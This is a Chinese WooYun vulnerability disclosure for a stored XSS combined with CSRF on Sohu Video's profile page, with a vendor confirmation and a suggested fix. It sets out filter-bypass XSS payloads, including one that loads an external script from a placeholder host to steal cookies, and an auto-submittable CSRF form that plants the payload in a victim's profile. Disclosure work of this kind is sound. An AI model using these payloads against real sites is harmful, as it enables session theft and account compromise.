当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195079

漏洞标题:搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)

相关厂商:搜狐

漏洞作者: px1624

提交时间:2016-04-12 09:36

修复时间:2016-05-27 10:20

公开时间:2016-05-27 10:20

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经确认,细节仅向厂商公开
2016-04-22: 细节向核心白帽子及相关领域专家公开
2016-05-02: 细节向普通白帽子公开
2016-05-12: 细节向实习白帽子公开
2016-05-27: 细节向公众公开

简要描述:

有详细的分析过程,绕过限制得需要一定的基础~

详细说明:

漏洞缺陷位置:基本资料 - 个人资料 - 通讯地址: http://my.tv.sohu.com/user/setting/basic.do
然后测试后发现,这里过滤了常见的script关键字,还有尖括号 >< ,单引号 ' ,圆括号 ) (
测试了一番后,绕过了这些过滤,成功弹窗。
payload:

xxxxxxxxxx" name=javasCript:alert%281%29 autofocus onfocus=location=this.name xx


代码执行流程如下图箭头所示:

1.jpg


然后尝试写入外部js文件,测试后发现有200字节的长度限制,注意一下过滤的那些东西,我直接给出payload吧。

xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx


如下图,成功写入代码,生成调用外部js文件的js代码,获取cookie~

2.jpg


3.jpg


4.jpg


漏洞证明:

这里做下简单的说明,为什么payload要这么写呢?
1 由于过滤了尖括号><,所以只能在input标签内部构造,input标签最好用的xss事件就是onfocus了
2 由于过滤了圆括号(),所以用 location=url编码 的这种模式可以将括号写为%28 %29
3 由于过滤了单引号',所以location='alert%271%28'这样就不能用了,所以利用this.name进行传值
4 script关键字有过滤,所以用sCript大小写混淆绕过
基本就这样了吧,综上就可以得出上面的payload了~
下面再说下CSRF漏洞,因为这里的单一XSS漏洞没有什么意义,只是个selfxss自己x自己的。
然后这里的post保存请求没有验证referer,所以可以CSRF,2者结合起来就可以X别人了。
中招CSRF就直接埋下了持久的XSS后门。
这里直接给出可以埋下,调用任意外部js文件,的CSRF的poc代码:

<form id="csrfdemo" action="http://my.tv.sohu.com/user/profile/basic_update.do" method="POST">
<input type='hidden' name='nickname' value='test12341478524'><input type='hidden' name='sex' value='0'><input type='hidden' name='usermail' value=''><input type='hidden' name='year' value='0000'><input type='hidden' name='month' value='00'><input type='hidden' name='day' value='00'><input type='hidden' name='city1' value='0'><input type='hidden' name='usersign' value=''><input type='hidden' name='address' value='xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx'><input type='hidden' name='postcode' value=''>
</form>
<button onclick="document.getElementById('csrfdemo').submit()">测试</button>


修复方案:

XSS 把剩下唯一没过滤的双引号,再过滤下就行了
CSRF 验证referer信息

版权声明:转载请注明来源 px1624@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-04-12 10:10

厂商回复:

感谢支持!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-12 10:17 | px1624 ( 普通白帽子 | Rank:1137 漏洞数:198 | px1624)

    小厂商 2分,醉了~~

  2. 2016-04-13 13:27 | discovery ( 路人 | Rank:9 漏洞数:3 | www.google.com)

    @px1624 搜狐咋也小厂商了

  3. 2016-05-27 10:21 | 酷帥王子 ( 普通白帽子 | Rank:262 漏洞数:71 | 天之屌,人之神!天人合一,乃屌神也!绝对...)

    没想到过滤<>竟然搞得有声有色,666不错

  4. 2016-05-27 10:25 | 重瞳 ( 路人 | Rank:10 漏洞数:1 | 我是重瞳)

    @酷帥王子 哈哈哈